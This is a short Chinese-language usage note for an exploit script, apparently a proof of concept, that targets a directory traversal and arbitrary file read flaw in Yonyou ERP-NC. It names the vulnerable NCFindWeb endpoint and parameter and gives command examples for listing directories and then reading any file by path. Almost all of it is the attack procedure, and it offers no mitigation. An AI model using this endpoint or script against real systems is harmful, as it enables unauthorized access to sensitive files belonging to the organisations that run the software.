用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
用友ERP-NC
/NCFindWeb?service=IPreAlertConfigService&filename=
/NCFindWeb?service=IPreAlertConfigService&filename=filename
Usage: exp.py [OPTIONS]
Options:
-u, --url TEXT 目标url
-f, --filename TEXT 读取文件的名字
--help Show this message and exit.
目录遍历:
python3 exp.py --url http://127.0.0.1任意文件读取:
python3 exp.py --url http://127.0.0.1 --filename a.txt读取文件内容时,可以通过先目录遍历获取文件路径,读取文件内容时,将文件路径传递给filename 参数